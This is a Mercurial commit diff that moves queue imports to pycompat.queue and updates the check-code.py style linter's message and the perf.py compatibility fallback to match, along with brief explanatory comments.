pycompat: export queue module instead of symbols in module (API)...

Gregory Szorc
r37863:8fb99853 (branch: default)
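The API shift this commit makes is easy to miss in the diff below, so here is a minimal before/after sketch. The pycompat.queue names are taken from the diff itself; the surrounding queue operations are illustrative only, not part of the commit:

    # Sketch of the API change (assumes a Mercurial with this commit).
    from mercurial import pycompat

    # Before: pycompat re-exported individual symbols, consumed as
    # util.queue (the Queue class) and util.empty (the Empty exception).
    # After: pycompat exports the stdlib module itself, so callers spell
    # out the symbols they need:
    q = pycompat.queue.Queue()
    q.put('item')
    q.get()                      # -> 'item'
    try:
        q.get(block=False)       # nothing left in the queue
    except pycompat.queue.Empty:
        pass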
contrib/check-code.py
@@ -1,741 +1,742 @@
#!/usr/bin/env python
#
# check-code - a style and portability checker for Mercurial
#
# Copyright 2010 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""style and portability checker for Mercurial

when a rule triggers wrong, do one of the following (prefer one from top):
 * do the work-around the rule suggests
 * doublecheck that it is a false match
 * improve the rule pattern
 * add an ignore pattern to the rule (3rd arg) which matches your good line
   (you can append a short comment and match this, like: #re-raises)
 * change the pattern to a warning and list the exception in test-check-code-hg
 * ONLY use no--check-code for skipping entire files from external sources
"""

from __future__ import absolute_import, print_function
import glob
import keyword
import optparse
import os
import re
import sys
if sys.version_info[0] < 3:
    opentext = open
else:
    def opentext(f):
        return open(f, encoding='ascii')
try:
    xrange
except NameError:
    xrange = range
try:
    import re2
except ImportError:
    re2 = None

def compilere(pat, multiline=False):
    if multiline:
        pat = '(?m)' + pat
    if re2:
        try:
            return re2.compile(pat)
        except re2.error:
            pass
    return re.compile(pat)

# check "rules depending on implementation of repquote()" in each
# patterns (especially pypats), before changing around repquote()
_repquotefixedmap = {' ': ' ', '\n': '\n', '.': 'p', ':': 'q',
                     '%': '%', '\\': 'b', '*': 'A', '+': 'P', '-': 'M'}
def _repquoteencodechr(i):
    if i > 255:
        return 'u'
    c = chr(i)
    if c in _repquotefixedmap:
        return _repquotefixedmap[c]
    if c.isalpha():
        return 'x'
    if c.isdigit():
        return 'n'
    return 'o'
_repquotett = ''.join(_repquoteencodechr(i) for i in xrange(256))

def repquote(m):
    t = m.group('text')
    t = t.translate(_repquotett)
    return m.group('quote') + t + m.group('quote')

def reppython(m):
    comment = m.group('comment')
    if comment:
        l = len(comment.rstrip())
        return "#" * l + comment[l:]
    return repquote(m)

def repcomment(m):
    return m.group(1) + "#" * len(m.group(2))

def repccomment(m):
    t = re.sub(r"((?<=\n) )|\S", "x", m.group(2))
    return m.group(1) + t + "*/"

def repcallspaces(m):
    t = re.sub(r"\n\s+", "\n", m.group(2))
    return m.group(1) + t

def repinclude(m):
    return m.group(1) + "<foo>"

def rephere(m):
    t = re.sub(r"\S", "x", m.group(2))
    return m.group(1) + t


testpats = [
  [
    (r'\b(push|pop)d\b', "don't use 'pushd' or 'popd', use 'cd'"),
    (r'\W\$?\(\([^\)\n]*\)\)', "don't use (()) or $(()), use 'expr'"),
    (r'grep.*-q', "don't use 'grep -q', redirect to /dev/null"),
    (r'(?<!hg )grep.* -a', "don't use 'grep -a', use in-line python"),
    (r'sed.*-i', "don't use 'sed -i', use a temporary file"),
    (r'\becho\b.*\\n', "don't use 'echo \\n', use printf"),
    (r'echo -n', "don't use 'echo -n', use printf"),
    (r'(^|\|\s*)\bwc\b[^|]*$\n(?!.*\(re\))', "filter wc output"),
    (r'head -c', "don't use 'head -c', use 'dd'"),
    (r'tail -n', "don't use the '-n' option to tail, just use '-<num>'"),
    (r'sha1sum', "don't use sha1sum, use $TESTDIR/md5sum.py"),
    (r'\bls\b.*-\w*R', "don't use 'ls -R', use 'find'"),
    (r'printf.*[^\\]\\([1-9]|0\d)', r"don't use 'printf \NNN', use Python"),
    (r'printf.*[^\\]\\x', "don't use printf \\x, use Python"),
    (r'\$\(.*\)', "don't use $(expr), use `expr`"),
    (r'rm -rf \*', "don't use naked rm -rf, target a directory"),
    (r'\[[^\]]+==', '[ foo == bar ] is a bashism, use [ foo = bar ] instead'),
    (r'(^|\|\s*)grep (-\w\s+)*[^|]*[(|]\w',
     "use egrep for extended grep syntax"),
    (r'(^|\|\s*)e?grep .*\\S', "don't use \\S in regular expression"),
    (r'(?<!!)/bin/', "don't use explicit paths for tools"),
    (r'#!.*/bash', "don't use bash in shebang, use sh"),
    (r'[^\n]\Z', "no trailing newline"),
    (r'export .*=', "don't export and assign at once"),
    (r'^source\b', "don't use 'source', use '.'"),
    (r'touch -d', "don't use 'touch -d', use 'touch -t' instead"),
    (r'\bls +[^|\n-]+ +-', "options to 'ls' must come before filenames"),
    (r'[^>\n]>\s*\$HGRCPATH', "don't overwrite $HGRCPATH, append to it"),
    (r'^stop\(\)', "don't use 'stop' as a shell function name"),
    (r'(\[|\btest\b).*-e ', "don't use 'test -e', use 'test -f'"),
    (r'\[\[\s+[^\]]*\]\]', "don't use '[[ ]]', use '[ ]'"),
    (r'^alias\b.*=', "don't use alias, use a function"),
    (r'if\s*!', "don't use '!' to negate exit status"),
    (r'/dev/u?random', "don't use entropy, use /dev/zero"),
    (r'do\s*true;\s*done', "don't use true as loop body, use sleep 0"),
    (r'sed (-e )?\'(\d+|/[^/]*/)i(?!\\\n)',
     "put a backslash-escaped newline after sed 'i' command"),
    (r'^diff *-\w*[uU].*$\n(^ \$ |^$)', "prefix diff -u/-U with cmp"),
    (r'^\s+(if)? diff *-\w*[uU]', "prefix diff -u/-U with cmp"),
    (r'[\s="`\']python\s(?!bindings)', "don't use 'python', use '$PYTHON'"),
    (r'seq ', "don't use 'seq', use $TESTDIR/seq.py"),
    (r'\butil\.Abort\b', "directly use error.Abort"),
    (r'\|&', "don't use |&, use 2>&1"),
    (r'\w =  +\w', "only one space after = allowed"),
    (r'\bsed\b.*[^\\]\\n', "don't use 'sed ... \\n', use a \\ and a newline"),
    (r'env.*-u', "don't use 'env -u VAR', use 'unset VAR'"),
    (r'cp.* -r ', "don't use 'cp -r', use 'cp -R'"),
    (r'grep.* -[ABC]', "don't use grep's context flags"),
    (r'find.*-printf',
     "don't use 'find -printf', it doesn't exist on BSD find(1)"),
    (r'\$RANDOM ', "don't use bash-only $RANDOM to generate random values"),
  ],
  # warnings
  [
    (r'^function', "don't use 'function', use old style"),
    (r'^diff.*-\w*N', "don't use 'diff -N'"),
    (r'\$PWD|\${PWD}', "don't use $PWD, use `pwd`"),
    (r'^([^"\'\n]|("[^"\n]*")|(\'[^\'\n]*\'))*\^', "^ must be quoted"),
    (r'kill (`|\$\()', "don't use kill, use killdaemons.py")
  ]
]

testfilters = [
    (r"( *)(#([^!][^\n]*\S)?)", repcomment),
    (r"<<(\S+)((.|\n)*?\n\1)", rephere),
]

uprefix = r"^  \$ "
utestpats = [
  [
    (r'^(\S.*||  [$>] \S.*)[ \t]\n', "trailing whitespace on non-output"),
    (uprefix + r'.*\|\s*sed[^|>\n]*\n',
     "use regex test output patterns instead of sed"),
    (uprefix + r'(true|exit 0)', "explicit zero exit unnecessary"),
    (uprefix + r'.*(?<!\[)\$\?', "explicit exit code checks unnecessary"),
    (uprefix + r'.*\|\| echo.*(fail|error)',
     "explicit exit code checks unnecessary"),
    (uprefix + r'set -e', "don't use set -e"),
    (uprefix + r'(\s|fi\b|done\b)', "use > for continued lines"),
    (uprefix + r'.*:\.\S*/', "x:.y in a path does not work on msys, rewrite "
     "as x://.y, or see `hg log -k msys` for alternatives", r'-\S+:\.|' #-Rxxx
     '# no-msys'), # in test-pull.t which is skipped on windows
    (r'^  [^$>].*27\.0\.0\.1',
     'use $LOCALIP not an explicit loopback address'),
    (r'^  (?![>$] ).*\$LOCALIP.*[^)]$',
     'mark $LOCALIP output lines with (glob) to help tests in BSD jails'),
    (r'^  (cat|find): .*: \$ENOENT\$',
     'use test -f to test for file existence'),
    (r'^  diff -[^ -]*p',
     "don't use (external) diff with -p for portability"),
    (r' readlink ', 'use readlink.py instead of readlink'),
    (r'^  [-+][-+][-+] .* [-+]0000 \(glob\)',
     "glob timezone field in diff output for portability"),
    (r'^  @@ -[0-9]+ [+][0-9]+,[0-9]+ @@',
     "use '@@ -N* +N,n @@ (glob)' style chunk header for portability"),
    (r'^  @@ -[0-9]+,[0-9]+ [+][0-9]+ @@',
     "use '@@ -N,n +N* @@ (glob)' style chunk header for portability"),
    (r'^  @@ -[0-9]+ [+][0-9]+ @@',
     "use '@@ -N* +N* @@ (glob)' style chunk header for portability"),
    (uprefix + r'hg( +-[^ ]+( +[^ ]+)?)* +extdiff'
     r'( +(-[^ po-]+|--(?!program|option)[^ ]+|[^-][^ ]*))*$',
     "use $RUNTESTDIR/pdiff via extdiff (or -o/-p for false-positives)"),
  ],
  # warnings
  [
    (r'^  (?!.*\$LOCALIP)[^*?/\n]* \(glob\)$',
     "glob match with no glob string (?, *, /, and $LOCALIP)"),
  ]
]

# transform plain test rules to unified test's
for i in [0, 1]:
    for tp in testpats[i]:
        p = tp[0]
        m = tp[1]
        if p.startswith(r'^'):
            p = r"^  [$>] (%s)" % p[1:]
        else:
            p = r"^  [$>] .*(%s)" % p
        utestpats[i].append((p, m) + tp[2:])

# don't transform the following rules:
# "  > \t" and "  \t" should be allowed in unified tests
testpats[0].append((r'^( *)\t', "don't use tabs to indent"))
utestpats[0].append((r'^( ?)\t', "don't use tabs to indent"))

utestfilters = [
    (r"<<(\S+)((.|\n)*?\n  > \1)", rephere),
    (r"( +)(#([^!][^\n]*\S)?)", repcomment),
]

pypats = [
  [
    (r'^\s*def\s*\w+\s*\(.*,\s*\(',
     "tuple parameter unpacking not available in Python 3+"),
    (r'lambda\s*\(.*,.*\)',
     "tuple parameter unpacking not available in Python 3+"),
    (r'(?<!def)\s+(cmp)\(', "cmp is not available in Python 3+"),
    (r'(?<!\.)\breduce\s*\(.*', "reduce is not available in Python 3+"),
    (r'\bdict\(.*=', 'dict() is different in Py2 and 3 and is slower than {}',
     'dict-from-generator'),
    (r'\.has_key\b', "dict.has_key is not available in Python 3+"),
    (r'\s<>\s', '<> operator is not available in Python 3+, use !='),
    (r'^\s*\t', "don't use tabs"),
    (r'\S;\s*\n', "semicolon"),
    (r'[^_]_\([ \t\n]*(?:"[^"]+"[ \t\n+]*)+%', "don't use % inside _()"),
    (r"[^_]_\([ \t\n]*(?:'[^']+'[ \t\n+]*)+%", "don't use % inside _()"),
    (r'(\w|\)),\w', "missing whitespace after ,"),
    (r'(\w|\))[+/*\-<>]\w', "missing whitespace in expression"),
    (r'^\s+(\w|\.)+=\w[^,()\n]*$', "missing whitespace in assignment"),
    (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
    ((
        # a line ending with a colon, potentially with trailing comments
        r':([ \t]*#[^\n]*)?\n'
        # one that is not a pass and not only a comment
        r'(?P<indent>[ \t]+)[^#][^\n]+\n'
        # more lines at the same indent level
        r'((?P=indent)[^\n]+\n)*'
        # a pass at the same indent level, which is bogus
        r'(?P=indent)pass[ \t\n#]'
    ), 'omit superfluous pass'),
    (r'.{81}', "line too long"),
    (r'[^\n]\Z', "no trailing newline"),
    (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
    # (r'^\s+[^_ \n][^_. \n]+_[^_\n]+\s*=',
    #  "don't use underbars in identifiers"),
    (r'^\s+(self\.)?[A-Za-z][a-z0-9]+[A-Z]\w* = ',
     "don't use camelcase in identifiers", r'#.*camelcase-required'),
    (r'^\s*(if|while|def|class|except|try)\s[^[\n]*:\s*[^\\n]#\s]+',
     "linebreak after :"),
    (r'class\s[^( \n]+:', "old-style class, use class foo(object)",
     r'#.*old-style'),
    (r'class\s[^( \n]+\(\):',
     "class foo() creates old style object, use class foo(object)",
     r'#.*old-style'),
    (r'\b(%s)\(' % '|'.join(k for k in keyword.kwlist
                            if k not in ('print', 'exec')),
     "Python keyword is not a function"),
    (r',]', "unneeded trailing ',' in list"),
    # (r'class\s[A-Z][^\(]*\((?!Exception)',
    #  "don't capitalize non-exception classes"),
    # (r'in range\(', "use xrange"),
    # (r'^\s*print\s+', "avoid using print in core and extensions"),
    (r'[\x80-\xff]', "non-ASCII character literal"),
    (r'("\')\.format\(', "str.format() has no bytes counterpart, use %"),
    (r'^\s*(%s)\s\s' % '|'.join(keyword.kwlist),
     "gratuitous whitespace after Python keyword"),
    (r'([\(\[][ \t]\S)|(\S[ \t][\)\]])', "gratuitous whitespace in () or []"),
    # (r'\s\s=', "gratuitous whitespace before ="),
    (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
     "missing whitespace around operator"),
    (r'[^>< ](\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\s',
     "missing whitespace around operator"),
    (r'\s(\+=|-=|!=|<>|<=|>=|<<=|>>=|%=)\S',
     "missing whitespace around operator"),
    (r'[^^+=*/!<>&| %-](\s=|=\s)[^= ]',
     "wrong whitespace around ="),
    (r'\([^()]*( =[^=]|[^<>!=]= )',
     "no whitespace around = for named parameters"),
    (r'raise Exception', "don't raise generic exceptions"),
    (r'raise [^,(]+, (\([^\)]+\)|[^,\(\)]+)$',
     "don't use old-style two-argument raise, use Exception(message)"),
    (r' is\s+(not\s+)?["\'0-9-]', "object comparison with literal"),
    (r' [=!]=\s+(True|False|None)',
     "comparison with singleton, use 'is' or 'is not' instead"),
    (r'^\s*(while|if) [01]:',
     "use True/False for constant Boolean expression"),
    (r'^\s*if False(:| +and)', 'Remove code instead of using `if False`'),
    (r'(?:(?<!def)\s+|\()hasattr\(',
     'hasattr(foo, bar) is broken on py2, use util.safehasattr(foo, bar) '
     'instead', r'#.*hasattr-py3-only'),
    (r'opener\([^)]*\).read\(',
     "use opener.read() instead"),
    (r'opener\([^)]*\).write\(',
     "use opener.write() instead"),
    (r'[\s\(](open|file)\([^)]*\)\.read\(',
     "use util.readfile() instead"),
    (r'[\s\(](open|file)\([^)]*\)\.write\(',
     "use util.writefile() instead"),
    (r'^[\s\(]*(open(er)?|file)\([^)]*\)(?!\.close\(\))',
     "always assign an opened file to a variable, and close it afterwards"),
    (r'[\s\(](open|file)\([^)]*\)\.(?!close\(\))',
     "always assign an opened file to a variable, and close it afterwards"),
    (r'(?i)descend[e]nt', "the proper spelling is descendAnt"),
    (r'\.debug\(\_', "don't mark debug messages for translation"),
    (r'\.strip\(\)\.split\(\)', "no need to strip before splitting"),
    (r'^\s*except\s*:', "naked except clause", r'#.*re-raises'),
    (r'^\s*except\s([^\(,]+|\([^\)]+\))\s*,',
     'legacy exception syntax; use "as" instead of ","'),
    (r':\n(    )*( ){1,3}[^ ]', "must indent 4 spaces"),
    (r'release\(.*wlock, .*lock\)', "wrong lock release order"),
    (r'\bdef\s+__bool__\b', "__bool__ should be __nonzero__ in Python 2"),
    (r'os\.path\.join\(.*, *(""|\'\')\)',
     "use pathutil.normasprefix(path) instead of os.path.join(path, '')"),
    (r'\s0[0-7]+\b', 'legacy octal syntax; use "0o" prefix instead of "0"'),
    # XXX only catch mutable arguments on the first line of the definition
    (r'def.*[( ]\w+=\{\}', "don't use mutable default arguments"),
    (r'\butil\.Abort\b', "directly use error.Abort"),
    (r'^@(\w*\.)?cachefunc', "module-level @cachefunc is risky, please avoid"),
    (r'^import atexit', "don't use atexit, use ui.atexit"),
-    (r'^import Queue', "don't use Queue, use util.queue + util.empty"),
+    (r'^import Queue', "don't use Queue, use pycompat.queue.Queue + "
+     "pycompat.queue.Empty"),
    (r'^import cStringIO', "don't use cStringIO.StringIO, use util.stringio"),
    (r'^import urllib', "don't use urllib, use util.urlreq/util.urlerr"),
    (r'^import SocketServer', "don't use SockerServer, use util.socketserver"),
    (r'^import urlparse', "don't use urlparse, use util.urlreq"),
    (r'^import xmlrpclib', "don't use xmlrpclib, use util.xmlrpclib"),
    (r'^import cPickle', "don't use cPickle, use util.pickle"),
    (r'^import pickle', "don't use pickle, use util.pickle"),
    (r'^import httplib', "don't use httplib, use util.httplib"),
    (r'^import BaseHTTPServer', "use util.httpserver instead"),
    (r'^(from|import) mercurial\.(cext|pure|cffi)',
     "use mercurial.policy.importmod instead"),
    (r'\.next\(\)', "don't use .next(), use next(...)"),
    (r'([a-z]*).revision\(\1\.node\(',
     "don't convert rev to node before passing to revision(nodeorrev)"),
    (r'platform\.system\(\)', "don't use platform.system(), use pycompat"),

    # rules depending on implementation of repquote()
    (r' x+[xpqo%APM][\'"]\n\s+[\'"]x',
     'string join across lines with no space'),
    (r'''(?x)ui\.(status|progress|write|note|warn)\(
         [ \t\n#]*
         (?# any strings/comments might precede a string, which
           # contains translatable message)
         ((['"]|\'\'\'|""")[ \npq%bAPMxno]*(['"]|\'\'\'|""")[ \t\n#]+)*
         (?# sequence consisting of below might precede translatable message
           # - formatting string: "% 10s", "%05d", "% -3.2f", "%*s", "%%" ...
           # - escaped character: "\\", "\n", "\0" ...
           # - character other than '%', 'b' as '\', and 'x' as alphabet)
         (['"]|\'\'\'|""")
         ((%([ n]?[PM]?([np]+|A))?x)|%%|b[bnx]|[ \nnpqAPMo])*x
         (?# this regexp can't use [^...] style,
           # because _preparepats forcibly adds "\n" into [^...],
           # even though this regexp wants match it against "\n")''',
     "missing _() in ui message (use () to hide false-positives)"),
  ],
  # warnings
  [
    # rules depending on implementation of repquote()
    (r'(^| )pp +xxxxqq[ \n][^\n]', "add two newlines after '.. note::'"),
  ]
]

pyfilters = [
    (r"""(?msx)(?P<comment>\#.*?$)|
         ((?P<quote>('''|\"\"\"|(?<!')'(?!')|(?<!")"(?!")))
          (?P<text>(([^\\]|\\.)*?))
          (?P=quote))""", reppython),
]

# non-filter patterns
pynfpats = [
    [
        (r'pycompat\.osname\s*[=!]=\s*[\'"]nt[\'"]', "use pycompat.iswindows"),
        (r'pycompat\.osname\s*[=!]=\s*[\'"]posix[\'"]', "use pycompat.isposix"),
        (r'pycompat\.sysplatform\s*[!=]=\s*[\'"]darwin[\'"]',
         "use pycompat.isdarwin"),
    ],
    # warnings
    [],
]

# extension non-filter patterns
pyextnfpats = [
    [(r'^"""\n?[A-Z]', "don't capitalize docstring title")],
    # warnings
    [],
]

txtfilters = []

txtpats = [
  [
    ('\s$', 'trailing whitespace'),
    ('.. note::[ \n][^\n]', 'add two newlines after note::')
  ],
  []
]

cpats = [
  [
    (r'//', "don't use //-style comments"),
    (r'\S\t', "don't use tabs except for indent"),
    (r'(\S[ \t]+|^[ \t]+)\n', "trailing whitespace"),
    (r'.{81}', "line too long"),
    (r'(while|if|do|for)\(', "use space after while/if/do/for"),
    (r'return\(', "return is not a function"),
    (r' ;', "no space before ;"),
    (r'[^;] \)', "no space before )"),
    (r'[)][{]', "space between ) and {"),
    (r'\w+\* \w+', "use int *foo, not int* foo"),
    (r'\W\([^\)]+\) \w+', "use (int)foo, not (int) foo"),
    (r'\w+ (\+\+|--)', "use foo++, not foo ++"),
    (r'\w,\w', "missing whitespace after ,"),
    (r'^[^#]\w[+/*]\w', "missing whitespace in expression"),
    (r'\w\s=\s\s+\w', "gratuitous whitespace after ="),
    (r'^#\s+\w', "use #foo, not # foo"),
    (r'[^\n]\Z', "no trailing newline"),
    (r'^\s*#import\b', "use only #include in standard C code"),
    (r'strcpy\(', "don't use strcpy, use strlcpy or memcpy"),
    (r'strcat\(', "don't use strcat"),

    # rules depending on implementation of repquote()
  ],
  # warnings
  [
    # rules depending on implementation of repquote()
  ]
]

cfilters = [
    (r'(/\*)(((\*(?!/))|[^*])*)\*/', repccomment),
    (r'''(?P<quote>(?<!")")(?P<text>([^"]|\\")+)"(?!")''', repquote),
    (r'''(#\s*include\s+<)([^>]+)>''', repinclude),
    (r'(\()([^)]+\))', repcallspaces),
]

inutilpats = [
    [
        (r'\bui\.', "don't use ui in util"),
    ],
    # warnings
    []
]

inrevlogpats = [
    [
        (r'\brepo\.', "don't use repo in revlog"),
    ],
    # warnings
    []
]

webtemplatefilters = []

webtemplatepats = [
    [],
    [
        (r'{desc(\|(?!websub|firstline)[^\|]*)+}',
         'follow desc keyword with either firstline or websub'),
    ]
]

allfilesfilters = []

allfilespats = [
    [
        (r'(http|https)://[a-zA-Z0-9./]*selenic.com/',
         'use mercurial-scm.org domain URL'),
        (r'mercurial@selenic\.com',
         'use mercurial-scm.org domain for mercurial ML address'),
        (r'mercurial-devel@selenic\.com',
         'use mercurial-scm.org domain for mercurial-devel ML address'),
    ],
    # warnings
    [],
]

py3pats = [
    [
        (r'os\.environ', "use encoding.environ instead (py3)", r'#.*re-exports'),
        (r'os\.name', "use pycompat.osname instead (py3)"),
        (r'os\.getcwd', "use pycompat.getcwd instead (py3)"),
        (r'os\.sep', "use pycompat.ossep instead (py3)"),
        (r'os\.pathsep', "use pycompat.ospathsep instead (py3)"),
        (r'os\.altsep', "use pycompat.osaltsep instead (py3)"),
        (r'sys\.platform', "use pycompat.sysplatform instead (py3)"),
        (r'getopt\.getopt', "use pycompat.getoptb instead (py3)"),
        (r'os\.getenv', "use encoding.environ.get instead"),
        (r'os\.setenv', "modifying the environ dict is not preferred"),
    ],
    # warnings
    [],
]

checks = [
    ('python', r'.*\.(py|cgi)$', r'^#!.*python', pyfilters, pypats),
    ('python', r'.*\.(py|cgi)$', r'^#!.*python', [], pynfpats),
    ('python', r'.*hgext.*\.py$', '', [], pyextnfpats),
    ('python 3', r'.*(hgext|mercurial)/(?!demandimport|policy|pycompat).*\.py',
     '', pyfilters, py3pats),
    ('test script', r'(.*/)?test-[^.~]*$', '', testfilters, testpats),
    ('c', r'.*\.[ch]$', '', cfilters, cpats),
    ('unified test', r'.*\.t$', '', utestfilters, utestpats),
    ('layering violation repo in revlog', r'mercurial/revlog\.py', '',
     pyfilters, inrevlogpats),
    ('layering violation ui in util', r'mercurial/util\.py', '', pyfilters,
     inutilpats),
    ('txt', r'.*\.txt$', '', txtfilters, txtpats),
    ('web template', r'mercurial/templates/.*\.tmpl', '',
     webtemplatefilters, webtemplatepats),
    ('all except for .po', r'.*(?<!\.po)$', '',
     allfilesfilters, allfilespats),
]

def _preparepats():
    for c in checks:
        failandwarn = c[-1]
        for pats in failandwarn:
            for i, pseq in enumerate(pats):
                # fix-up regexes for multi-line searches
                p = pseq[0]
                # \s doesn't match \n (done in two steps)
                # first, we replace \s that appears in a set already
                p = re.sub(r'\[\\s', r'[ \\t', p)
                # now we replace other \s instances.
                p = re.sub(r'(?<!(\\|\[))\\s', r'[ \\t]', p)
                # [^...] doesn't match newline
                p = re.sub(r'(?<!\\)\[\^', r'[^\\n', p)

                pats[i] = (re.compile(p, re.MULTILINE),) + pseq[1:]
        filters = c[3]
        for i, flt in enumerate(filters):
            filters[i] = re.compile(flt[0]), flt[1]

class norepeatlogger(object):
    def __init__(self):
        self._lastseen = None

    def log(self, fname, lineno, line, msg, blame):
        """print error related a to given line of a given file.

        The faulty line will also be printed but only once in the case
        of multiple errors.

        :fname: filename
        :lineno: line number
        :line: actual content of the line
        :msg: error message
        """
        msgid = fname, lineno, line
        if msgid != self._lastseen:
            if blame:
                print("%s:%d (%s):" % (fname, lineno, blame))
            else:
                print("%s:%d:" % (fname, lineno))
            print(" > %s" % line)
            self._lastseen = msgid
        print(" " + msg)

_defaultlogger = norepeatlogger()

def getblame(f):
    lines = []
    for l in os.popen('hg annotate -un %s' % f):
        start, line = l.split(':', 1)
        user, rev = start.split()
        lines.append((line[1:-1], user, rev))
    return lines

def checkfile(f, logfunc=_defaultlogger.log, maxerr=None, warnings=False,
              blame=False, debug=False, lineno=True):
    """checks style and portability of a given file

    :f: filepath
    :logfunc: function used to report error
              logfunc(filename, linenumber, linecontent, errormessage)
    :maxerr: number of error to display before aborting.
             Set to false (default) to report all errors

    return True if no error is found, False otherwise.
    """
    blamecache = None
    result = True

    try:
        with opentext(f) as fp:
            try:
                pre = post = fp.read()
            except UnicodeDecodeError as e:
                print("%s while reading %s" % (e, f))
                return result
    except IOError as e:
        print("Skipping %s, %s" % (f, str(e).split(':', 1)[0]))
        return result

    for name, match, magic, filters, pats in checks:
        post = pre # discard filtering result of previous check
        if debug:
            print(name, f)
        fc = 0
        if not (re.match(match, f) or (magic and re.search(magic, pre))):
            if debug:
                print("Skipping %s for %s it doesn't match %s" % (
                       name, match, f))
            continue
        if "no-" "check-code" in pre:
            # If you're looking at this line, it's because a file has:
            # no- check- code
            # but the reason to output skipping is to make life for
            # tests easier. So, instead of writing it with a normal
            # spelling, we write it with the expected spelling from
            # tests/test-check-code.t
            print("Skipping %s it has no-che?k-code (glob)" % f)
            return "Skip" # skip checking this file
        for p, r in filters:
            post = re.sub(p, r, post)
        nerrs = len(pats[0]) # nerr elements are errors
        if warnings:
            pats = pats[0] + pats[1]
        else:
            pats = pats[0]
        # print post # uncomment to show filtered version

        if debug:
            print("Checking %s for %s" % (name, f))

        prelines = None
        errors = []
        for i, pat in enumerate(pats):
            if len(pat) == 3:
                p, msg, ignore = pat
            else:
                p, msg = pat
                ignore = None
            if i >= nerrs:
                msg = "warning: " + msg

            pos = 0
            n = 0
            for m in p.finditer(post):
                if prelines is None:
                    prelines = pre.splitlines()
                    postlines = post.splitlines(True)

                start = m.start()
                while n < len(postlines):
                    step = len(postlines[n])
                    if pos + step > start:
                        break
                    pos += step
                    n += 1
                l = prelines[n]

                if ignore and re.search(ignore, l, re.MULTILINE):
                    if debug:
                        print("Skipping %s for %s:%s (ignore pattern)" % (
                              name, f, n))
                    continue
                bd = ""
                if blame:
                    bd = 'working directory'
                    if not blamecache:
                        blamecache = getblame(f)
                    if n < len(blamecache):
                        bl, bu, br = blamecache[n]
                        if bl == l:
                            bd = '%s@%s' % (bu, br)

                errors.append((f, lineno and n + 1, l, msg, bd))
                result = False

        errors.sort()
        for e in errors:
            logfunc(*e)
            fc += 1
            if maxerr and fc >= maxerr:
                print(" (too many errors, giving up)")
                break

    return result

def main():
    parser = optparse.OptionParser("%prog [options] [files | -]")
    parser.add_option("-w", "--warnings", action="store_true",
                      help="include warning-level checks")
    parser.add_option("-p", "--per-file", type="int",
                      help="max warnings per file")
    parser.add_option("-b", "--blame", action="store_true",
                      help="use annotate to generate blame info")
    parser.add_option("", "--debug", action="store_true",
                      help="show debug information")
    parser.add_option("", "--nolineno", action="store_false",
                      dest='lineno', help="don't show line numbers")

    parser.set_defaults(per_file=15, warnings=False, blame=False, debug=False,
                        lineno=True)
    (options, args) = parser.parse_args()

    if len(args) == 0:
        check = glob.glob("*")
    elif args == ['-']:
        # read file list from stdin
        check = sys.stdin.read().splitlines()
    else:
        check = args

    _preparepats()

    ret = 0
    for f in check:
        if not checkfile(f, maxerr=options.per_file, warnings=options.warnings,
                         blame=options.blame, debug=options.debug,
                         lineno=options.lineno):
            ret = 1
    return ret

if __name__ == "__main__":
    sys.exit(main())
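One subtlety in check-code.py worth calling out before the next file: rules are compiled with re.MULTILINE and matched against the whole file at once, so _preparepats rewrites each pattern so that \s and [^...] cannot silently swallow newlines. A minimal standalone sketch of that rewrite, using one real rule from pypats above as the sample input:

    import re

    # Sample rule from pypats: "gratuitous whitespace after ="
    p = r'\w\s=\s\s+\w'
    # first, \s already inside a character class becomes [ \t...
    p = re.sub(r'\[\\s', r'[ \\t', p)
    # then bare \s becomes an explicit [ \t] class, so it can't match \n
    p = re.sub(r'(?<!(\\|\[))\\s', r'[ \\t]', p)
    # finally, negated classes are widened to also exclude \n
    p = re.sub(r'(?<!\\)\[\^', r'[^\\n', p)
    print(p)  # \w[ \t]=[ \t][ \t]+\w
    rx = re.compile(p, re.MULTILINE)
    assert rx.search('x =  y')        # flagged: two spaces after =
    assert not rx.search('x =\n  y')  # a line break is not "whitespace" here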
contrib/perf.py
@@ -1,1764 +1,1774 @@
# perf.py - performance test routines
'''helper extension to measure performance'''

# "historical portability" policy of perf.py:
#
# We have to do:
# - make perf.py "loadable" with as wide Mercurial version as possible
#   This doesn't mean that perf commands work correctly with that Mercurial.
#   BTW, perf.py itself has been available since 1.1 (or eb240755386d).
# - make historical perf command work correctly with as wide Mercurial
#   version as possible
#
# We have to do, if possible with reasonable cost:
# - make recent perf command for historical feature work correctly
#   with early Mercurial
#
# We don't have to do:
# - make perf command for recent feature work correctly with early
#   Mercurial

from __future__ import absolute_import
import functools
import gc
import os
import random
import struct
import sys
import threading
import time
from mercurial import (
    changegroup,
    cmdutil,
    commands,
    copies,
    error,
    extensions,
    mdiff,
    merge,
    revlog,
    util,
)

# for "historical portability":
# try to import modules separately (in dict order), and ignore
# failure, because these aren't available with early Mercurial
try:
    from mercurial import branchmap # since 2.5 (or bcee63733aad)
except ImportError:
    pass
try:
    from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
except ImportError:
    pass
try:
    from mercurial import registrar # since 3.7 (or 37d50250b696)
    dir(registrar) # forcibly load it
except ImportError:
    registrar = None
try:
    from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
except ImportError:
    pass
try:
    from mercurial import scmutil # since 1.9 (or 8b252e826c68)
except ImportError:
    pass
try:
    from mercurial import pycompat
    getargspec = pycompat.getargspec # added to module after 4.5
except (ImportError, AttributeError):
    import inspect
    getargspec = inspect.getargspec

74 try:
75 # 4.7+
76 queue = pycompat.queue.Queue
77 except (AttributeError, ImportError):
78 # Mercurial < 4.7
79 try:
80 queue = pycompat.queue
81 except (AttributeError, ImportError):
82 queue = util.queue
83
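# Whichever of the three fallbacks above applied, `queue` is now bound to a
# Queue class (not a module), so threaded code further down can instantiate
# it uniformly. A minimal usage sketch (mirroring _bdiffworker/perfbdiff
# below):
#
#   q = queue()
#   q.put(textpair)
#   textpair = q.get()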
74 # for "historical portability":
84 # for "historical portability":
75 # define util.safehasattr forcibly, because util.safehasattr has been
85 # define util.safehasattr forcibly, because util.safehasattr has been
76 # available since 1.9.3 (or 94b200a11cf7)
86 # available since 1.9.3 (or 94b200a11cf7)
77 _undefined = object()
